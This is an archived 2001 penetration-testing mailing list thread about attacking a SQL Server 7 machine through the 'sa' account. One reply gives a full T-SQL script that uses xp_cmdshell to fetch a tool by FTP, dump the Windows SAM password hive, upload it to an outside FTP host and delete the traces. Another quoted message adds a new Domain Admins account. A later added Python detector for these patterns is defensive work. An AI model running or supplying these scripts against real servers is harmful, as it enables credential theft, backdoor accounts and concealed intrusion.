Penetration Testing mailing list archives
Re: [PEN-TEST] Hacking a server through SQL SERVER 7
From: Attonbitus Deus <Thor () HAMMEROFGOD COM>
Date: Thu, 25 Jan 2001 10:53:57 -0800
Try the FTP command line FROM the box- many firewalls are configured to allow sessions initiated from the inside through. Though a bit cheesy, I use the following script to create line by line filenames, concatenate them together with a binary copy to make the ftp script, get the REG.EXE program that lets you dump the registry from a server, dump the SAM to a file, create another script that uploads that file, and to then clean up after yourself. I've messed around with DTS and other stuff to create these files, but this is down and dirty and works, so I have not spent that much time figuring out a better way. I got a couple of suggestions on a crack against the syslogins, but haven't tried them yet. I'll post findings on that when I get a chance.

Here is the script to get the SAM to crack offline- you can do the same to create any text-based file you want.

Declare @var1 sysname, @var2 sysname, @var3 sysname, @var4 sysname
Set @var1 = 'echo open ftp.myserver.com > test1.log'
Set @var2 = 'echo user username password > test2.log'
Set @var3 = 'echo get reg.exe > test3.log'
Set @var4 = 'echo quit > test4.log'
Exec xp_cmdshell @var1
Exec xp_cmdshell @var2
Exec xp_cmdshell @var3
Exec xp_cmdshell @var4
go

Declare @var5 sysname
Set @var5 = 'copy test1.log+test2.log+test3.log+test4.log test.log'
Exec xp_cmdshell @var5
go

Declare @var6 sysname
Set @var6 = 'ftp -n -s:test.log'
Exec xp_cmdshell @var6
go

Declare @var7 sysname
Set @var7 = 'del test*.log'
Exec xp_cmdshell @var7
go

Declare @var7 sysname
Set @var7 = 'reg save HKLM\SAM samback'
Exec xp_cmdshell @var7
go

Declare @var1 sysname, @var2 sysname, @var3 sysname, @var4 sysname
Set @var1 = 'echo open ftp.myserver.com > test1.log'
Set @var2 = 'echo user username password > test2.log'
Set @var3 = 'echo put samback > test3.log'
Set @var4 = 'echo quit > test4.log'
Exec xp_cmdshell @var1
Exec xp_cmdshell @var2
Exec xp_cmdshell @var3
Exec xp_cmdshell @var4
go

Declare @var5 sysname
Set @var5 = 'copy test1.log+test2.log+test3.log+test4.log test.log'
Exec xp_cmdshell @var5
go

Declare @var6 sysname
Set @var6 = 'ftp -n -s:test.log'
Exec xp_cmdshell @var6
go

Declare @var7 sysname
Set @var7 = 'del test*.log'
Exec xp_cmdshell @var7
go

Declare @var7 sysname
Set @var7 = 'del samback'
Exec xp_cmdshell @var7
go

Declare @var7 sysname
Set @var7 = 'del reg.exe'
Exec xp_cmdshell @var7
go

HTH

---------------------------------
Attonbitus Deus
Thor () HammerofGod Com

----- Original Message -----
From: "FiC" <fic () BIGFOOT COM>
To: <PEN-TEST () SECURITYFOCUS COM>
Sent: Thursday, January 25, 2001 1:32 AM
Subject: Re: [PEN-TEST] Hacking a server through SQL SERVER 7

Thank you all for your valuable information. Is there any way to upload/create a file in the hacked SQL SERVER through the system commands? I think that the machine is behind a Firewall and even if I start the FTP service I can't connect via ftp, and the port 139 is not open or it's filtered. I've tried to create an .asp file with the "copy con" command, but I can't do it through the SQL console. How can I upload/create an .asp file to this server? Thanx.
Once you have access to a MSSQL 7 server via the "sa" account, you can do all sorts of fun things:

Run system commands:

EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD /DOMAIN"
EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins' newuser /ADD /DOMAIN"

You can also access the registry, send email, dump system information... Take a look at some of the Extended Stored Procedures in the [master] database with SQL Query Analyzer. Depending on the user the server runs as (normally SYSTEM or Administrator), you can usually use xp_cmdshell to rebuild the repair disk data with rdisk /s and snag the SAM database.

I will be giving a presentation at the upcoming CanSecWest conference covering a variety of SQL server attacks, everything from general procedure exploitation to insertion techniques. At the conference, I will be releasing a handful of new tools, one of which exploits the RDS component in new ways, allowing access to SQL servers as well as proxying requests to internal systems through it. For more information on the conference, please see http://www.cansecwest.com, online registration should be available within a few weeks.
-- ~/ FiC /~
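The thread above shows why logging xp_cmdshell calls alone is not enough: the posted script never passes the OS command as a literal, it stages it in a local variable (Set @var = '...' followed by Exec xp_cmdshell @var), so a trace filter that only looks for xp_cmdshell 'literal' sees nothing useful. The following detector is an added example written for this archive page, not code from any poster or from SecurityFocus. It walks constructed trace records (login, database, batch text, tab-separated; the format and the sample rows are assumptions, not real SQL Server trace output), resolves variable-passed commands within the batch, and tags each xp_cmdshell invocation with the indicators the thread discusses: echo-to-file staging, scripted ftp sessions, a SAM hive dump via reg save, and net user/group /ADD.

```python
import re
from dataclasses import dataclass

# Constructed sample trace records: login <TAB> database <TAB> batch text.
# Batches 2-4 mirror the variable-passing style of the posted script; the
# rows are invented for this example and are not real trace output.
SAMPLE_TRACE = [
    "reporting\tshop\tSELECT COUNT(*) FROM orders WHERE shipped = 0",
    "sa\tmaster\tDeclare @var1 sysname Set @var1 = 'echo open ftp.myserver.com > test1.log' Exec xp_cmdshell @var1",
    "sa\tmaster\tDeclare @var6 sysname Set @var6 = 'ftp -n -s:test.log' Exec xp_cmdshell @var6",
    "sa\tmaster\tDeclare @var7 sysname Set @var7 = 'reg save HKLM\\SAM samback' Exec xp_cmdshell @var7",
    "webapp\tshop\tEXEC [master].[dbo].[xp_cmdshell] \"net user newuser newpass /ADD /DOMAIN\"",
    "sa\tmaster\tExec xp_cmdshell 'dir C:\\'",
]

# xp_cmdshell followed by either a local variable or a quoted literal;
# the optional ']' covers the bracketed [master].[dbo].[xp_cmdshell] form.
XP_CMDSHELL = re.compile(r"xp_cmdshell\]?\s+(@\w+|'[^']*'|\"[^\"]*\")", re.IGNORECASE)
# Set @var = 'literal' assignments inside the same batch.
ASSIGN = re.compile(r"\bset\s+(@\w+)\s*=\s*'([^']*)'", re.IGNORECASE)

# Indicator name -> pattern over the resolved OS command.
INDICATORS = [
    ("file-staging", re.compile(r"\becho\b.*>", re.IGNORECASE)),           # building files with echo redirects
    ("ftp-script", re.compile(r"\bftp\b.*-s:", re.IGNORECASE)),            # ftp driven by a script file
    ("sam-dump", re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SAM", re.IGNORECASE)),
    ("account-add", re.compile(r"\bnet\s+(user|group)\b.*\s/ADD\b", re.IGNORECASE)),
]


@dataclass
class Finding:
    login: str
    database: str
    command: str      # OS command handed to xp_cmdshell, after variable resolution
    indicators: list  # matching indicator names, possibly empty


def extract_commands(batch):
    """Return every OS command passed to xp_cmdshell in one batch.

    Commands passed through a variable are resolved from the Set @var = '...'
    assignment in the same batch; unresolvable variables are reported as such
    rather than dropped, so the call itself is never silently lost."""
    assignments = {name.lower(): value for name, value in ASSIGN.findall(batch)}
    commands = []
    for arg in XP_CMDSHELL.findall(batch):
        if arg.startswith("@"):
            value = assignments.get(arg.lower())
            commands.append(value if value is not None else f"<unresolved {arg}>")
        else:
            commands.append(arg[1:-1])  # strip the surrounding quotes
    return commands


def classify(command):
    """Indicator names whose pattern matches the resolved command."""
    return [name for name, rx in INDICATORS if rx.search(command)]


def scan(records):
    """Scan trace records and return one Finding per xp_cmdshell invocation."""
    findings = []
    for rec in records:
        login, database, batch = rec.split("\t", 2)
        for cmd in extract_commands(batch):
            findings.append(Finding(login, database, cmd, classify(cmd)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_TRACE):
        tags = ",".join(f.indicators) or "-"
        print(f"{f.login:<10} {f.database:<8} [{tags}] {f.command}")
```

Every xp_cmdshell call is reported, with or without indicators, because on a production database server the procedure has no routine business use; the indicators only rank the findings. The resolver handles the one-assignment-per-batch pattern of the posted script; a command built by string concatenation across several variables would surface as an unresolved name, which is still a finding worth a look.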
Current thread:
- [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 23)
- <Possible follow-ups>
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Derrick K. Bennett (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 H D Moore (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Attonbitus Deus (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 MadHat (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Brentlinger, Mike (ISS eServices) (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Frank Knobbe (Jan 25)